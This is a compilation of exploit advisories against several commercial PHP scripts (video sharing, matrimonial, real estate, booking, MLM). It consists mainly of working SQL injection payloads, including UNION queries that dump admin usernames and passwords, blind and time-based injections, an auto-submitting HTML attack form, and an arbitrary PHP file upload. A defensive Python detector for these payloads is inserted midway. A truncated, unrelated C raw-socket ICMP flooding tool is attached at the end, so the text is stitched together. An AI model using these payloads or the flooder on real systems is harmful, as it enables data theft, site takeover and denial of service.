# # # # # 
# Exploit Title: Readymade Video Sharing Script 3.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&report_videos[]=[SQL]&report_submit=
# 
# http://server/single-video-detail.php?video_id=MTMy&report_videos[]='&report_submit=
# 
# Parameter: report_videos[] (GET)
#     Type: boolean-based blind
#     Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
#     Payload: video_id=MTMy&report_videos[]=1' AND ELT(7764=7764,9174) AND 'BZFh'='BZFh&report_submit=
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: video_id=MTMy&report_videos[]=1' AND SLEEP(5) AND 'MRQT'='MRQT&report_submit=
# 	
# # # # #
            
# # # # # 
# Exploit Title: Multireligion Responsive Matrimonial 4.7.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
# Version: 4.7.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/success-story.php?succid=[SQL]
# 
# -16++/*!02222UNION*/(/*!02222SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929)--+-
# 
# 
# # # # #
            
# # # # # 
# Exploit Title: Responsive Realestate Script 3.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/responsive-realestate-script/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/property-list?tbud=5001-10000[SQL]&quicksrch1=
# 
# 34 columns
# 
# Parameter: tbud (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: tbud=5001-10000 AND 4719=4719&quicksrch1=
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: tbud=5001-10000 AND SLEEP(5)&quicksrch1=
# 
# # # # #
            
# # # # # 
# Exploit Title: Responsive Events & Movie Ticket Booking Script 3.2.1 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
# Version: 3.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/findcity.php?q=[SQL]
# 
# s'+/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230--+-
# 
# 
# Parameter: q (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: q=s%' AND 6957=6957 AND '%'='
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: q=s%' AND SLEEP(5) AND '%'='
# 	
# # # # #
            
# # # # # 
# Exploit Title: Single Theater Booking Script 3.2.1 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/single-theater-booking-script/
# Version: 3.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/findcity.php?q=[SQL]
# 
# s'++/*!02222UNION*/+/*!02222SELECT*/+1,2,3,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),5--+-
# 
# 
# # # # #
            
# # # # # 
# Exploit Title: Multiplex Movie Theater Booking Script 3.1.5 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/multiplex-theater-booking-script/
# Version: 3.1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
# 
# -122'++UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23--+-
# 
# 
# 2)
# http://localhost/[PATH]/show-time.php?moid=[SQL]
# 
# -102'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x7469636b65745f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23))--+-
# 
# 
# 3)
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
# 
# -45'++UNION+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(ticket_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_user,admin_pass,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
# 
# 
# # # # #
            
# # # # # 
# Exploit Title: Entrepreneur Bus Booking Script 3.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
# Version: 3.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/booker_details.php?sourcebus=[SQL]
# 
# -1++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
# 
# -1++/*!09999UNION*/+/*!09999SELECT*/+(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)/*!50000FROM*/(adminlogin)/*!50000WHERE*/(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,0x3c62723e555345524e414d453a,admin_username,0x3c62723e504153533a,admin_password,0x3c62723e564552204159415249,0x3c62723e))))x)--+-
# 
# 
# # # # #
            
# # # # # 
# Exploit Title: Advanced Real Estate Script 4.0.7 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-real-estate-script/
# Version: 4.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/search-results.php?Projectmain=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 2)
# http://localhost/[PATH]/search-results.php?proj_type=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!05555Select*/+export_set(5,@:=0,(/*!05555select*/+count(*)/*!05555from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!05555table_name*/,0x3c6c693e,2),/*!05555column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 3)
# http://localhost/[PATH]/search-results.php?searchtext=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 4)
# http://localhost/[PATH]/search-results.php?sell_price=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 5)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
# 
# -1022220'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 6)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
# 
# -45'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# # # # #
            
# # # # # 
# Exploit Title: MLM Forced Matrix 2.0.9 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/mlm-forced-matrix/
# Version: 2.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/news-detail.php?newid=[SQL]
#  
# -7'++/*!00008UNION*/(/*!00008SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0x3c6c693e,2),/*!00008column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
#  
# # # # #
            
# # # # # 
# Exploit Title: MLM Forex Market Plan Script 2.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/news_detail.php?newid=[SQL]
#  
# -7'++/*!06666UNION*/(/*!06666SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0x3c6c693e,2),/*!06666column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
# 
# 
# 2)
# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
#  
# -1'++/*!04444UNION*/(/*!04444SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!04444Select*/+export_set(5,@:=0,(/*!04444select*/+count(*)/*!04444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!04444table_name*/,0x3c6c693e,2),/*!04444column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629,0x37)--+-
# 
# 
# # # # #
            
# # # # # 
# Exploit Title: Groupon Clone Script 3.01 - 'state_id' 's' SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/
# Version: 3.01
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/city_ajax.php?state_id=[SQL]
#  
# -1'++/*!09999UNION*/+/*!09999SELECT*/+0x31,(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
# 
#  
# 2)
# http://localhost/[PATH]/category_list.php?search=[SQL]
#    
# # # # #
            
# # # # # 
# Exploit Title: Car Rental Script 2.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/car-rental-script/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/countrycode1.php?val=[SQL]
#  
# -1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+-
# 
#  
# # # # #
            
# # # # # 
# Exploit Title: Muslim Matrimonial Script 3.02 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/matrimonial-script/
# Version: 3.02
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/success-story.php?succid=[SQL]
#  
# -12++/*!04444UNION*/+/*!04444SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139--+-
# 
#     
# # # # #
            
# # # # # 
# Exploit Title: Resume Clone Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/resume-builder-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/preview.php?id=[SQL]
# 
# -2++/*!08888UNION*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x28313129,0x28313229,0x28313329,0x28313429)--+-
# 
# 	
# # # # #
            
# # # # # 
# Exploit Title: Advanced World Database 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-world-database/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL]
# http://localhost/[PATH]/state.php?country=[SQL]
# 
# Parameter: country (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva
# 	
# # # # #
            
# # # # #
# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload
# Dork: N/A
# Date: 11.12.2017
# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
# Demo: http://vanguard-demo.esy.es/
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows users to upload arbitrary files.
#
# Vulnerable Source:
# .....................
# $row = $row->fetch(PDO::FETCH_ASSOC);
# $folder_name = $row['id'] * 2;
# $folder_name_2 = $folder_name * 5;
# $check_dir1 = 'uploads/'.$folder_name;
# $check_dir2 = $check_dir.'/'.$folder_name_2;
# if (!is_dir($check_dir1)) { mkdir($check_dir1); }
# if (!is_dir($check_dir2)) { mkdir($check_dir2); }
# $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']);
# $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']);
# $main_path = $check_dir2."/".basename($_FILES['main_file']['name']);
# $error = 0;
# $upload_path = './';
# .....................
# 	
# Proof of Concept:
# 
# Users Add a new product/Add a product preview...
# 
# http://localhost/[PATH]/
# http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php
# 
# # # # #
            
<!--
# # # # # 
# Exploit Title: Basic Job Site Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://www.phpscriptsmall.com/product/ready-made-job-site-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
-->
<html>
<body>
<form id="allJobsearch" action="http://localhost/onlinejobsearch/job" method="post">
<input name="keyword" value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" type="hidden">
<button type="submit">Ver Ayari</button>
</form>
</body>
</html>
            
# # # # #
# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - SQL Injection
# Dork: N/A
# Date: 11.12.2017
# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/p/[SQL]
#  
# '++/*!50000UNION*/+/*!50000SELECT*/+1%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31%2c32%2c33--+-
# 
#  
# # # # #
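The PoC payloads in the phpscriptsmall advisories above share a few evasions that defeat naive keyword filters: MySQL version-comment wrappers such as `/*!02222UNION*/` (the body runs on any server newer than version 02222), `+` and `%2c` URL encoding, and mixed case. The detector below is an added example, not part of any advisory: it normalizes a query string the way the database would see it and then applies rules shaped after the UNION/SELECT, SLEEP, information_schema, tautology and export_set patterns seen in these PoCs. The access-log lines are constructed sample data and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!NNNNN ... */ whenever the server is newer than
# version NNNNN, so "/*!02222UNION*/" is plain UNION to the database while a
# keyword filter only sees a comment. Keep the body, drop the wrapper.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Rule shapes taken from the PoC payloads in the advisories above.
RULES = {
    "union-select": re.compile(r"\bunion\b[\s(]*\bselect\b", re.I),
    "time-based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "schema-enum": re.compile(r"\binformation_schema\b", re.I),
    "boolean-tautology": re.compile(r"(?<!\w)(\d+)\s*=\s*\1(?!\w)"),
    "export_set-trick": re.compile(r"\bexport_set\s*\(", re.I),
}

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')

# Constructed Apache-style access-log lines (sample data, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Dec/2017:10:00:01 +0000] "GET /single-video-detail.php'
    "?video_id=MTMy&report_videos[]=1'%20AND%20SLEEP(5)%20AND%20'MRQT'='MRQT"
    '&report_submit= HTTP/1.1" 200 512',
    '203.0.113.7 - - [09/Dec/2017:10:00:02 +0000] "GET /success-story.php'
    "?succid=-16++/*!02222UNION*/(/*!02222SELECT*/+1,2,(select+count(*)+from"
    '+information_schema.columns))--+- HTTP/1.1" 200 9001',
    '198.51.100.4 - - [09/Dec/2017:10:00:03 +0000] "GET /property-list'
    '?tbud=5001-10000&quicksrch1= HTTP/1.1" 200 4096',
    '203.0.113.7 - - [09/Dec/2017:10:00:04 +0000] "GET /property-list'
    '?tbud=5001-10000%20AND%204719=4719&quicksrch1= HTTP/1.1" 200 4096',
]


def normalize(value: str) -> str:
    """Undo the encodings used in the PoCs so rules see the SQL the server sees."""
    s = unquote_plus(value)              # '+' -> ' ', %2c -> ','
    s = unquote_plus(s)                  # second pass catches double encoding
    s = VERSION_COMMENT.sub(r" \1 ", s)  # /*!02222UNION*/ -> UNION
    s = PLAIN_COMMENT.sub(" ", s)        # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", s).strip()


def scan_value(raw: str) -> list:
    text = normalize(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan_query(query: str) -> dict:
    """Map each parameter name to the rules its value triggers (only if any)."""
    findings = {}
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")  # split on the first '=' only
        hits = scan_value(raw)
        if hits:
            findings[unquote_plus(name)] = hits
    return findings


def scan_log_line(line: str):
    """Return (path, findings) for one access-log line, or None if unparsable."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return path, scan_query(query)


def flagged(lines) -> list:
    """Only the (path, findings) pairs where at least one rule fired."""
    return [r for r in map(scan_log_line, lines) if r and r[1]]


if __name__ == "__main__":
    for path, findings in flagged(SAMPLE_LOG):
        print(path, findings)
```

The normalization step is the part worth reusing: without it the version-comment and URL-encoded variants on this page pass a plain `UNION SELECT` match, and a tautology rule keyed on `1=1` misses the random-number form sqlmap emits.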
            
#include <stdio.h>
#include <stdlib.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <string.h>
#include <netinet/ip.h>
#define handle(i) htons(i)
#define cicmp 32
#define aicmp() (a_flags & cicmp)
#define sending_p() if (sendto(rawsock,&packet,(sizeof packet),0,(struct sockaddr *)&victim,sizeof victim) < 0) {\
perror("sendto");\
exit(-1);\
}
struct sockaddr_in victim;
u_long change(const char *host);
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
char *class2ip(const char *class);
static void send_icmp(u_char garbage);
char *get_plain(const char *crypt_file, const char *xor_data_key);
static void usage(const char *argv0);
u_long dstaddr;
u_short dst_sp, dst_ep, src_sp, src_ep;
char *src_class, *dst_class;
int a_flags, rawsock;
struct {
int a;
int b;
void (*f)(u_char);
} a_list[] = {
{ cicmp, ICMP_ECHO, send_icmp },
{ 0, 0, (void *)NULL },
};
int
main(int argc, char *argv[])
{
int n, i, on = 1;
int b_link;
#ifdef F_PASS
struct stat sb;
#endif
unsigned int until;
a_flags = dstaddr = i = 0;
dst_sp = dst_ep = src_sp = src_ep = 0;
until = b_link = -1;
src_class = dst_class = NULL;
while ( (n = getopt(argc, argv, "Is:h:")) != -1) {
char *p;
switch (n) {
case 'I':
a_flags |= cicmp;
break;
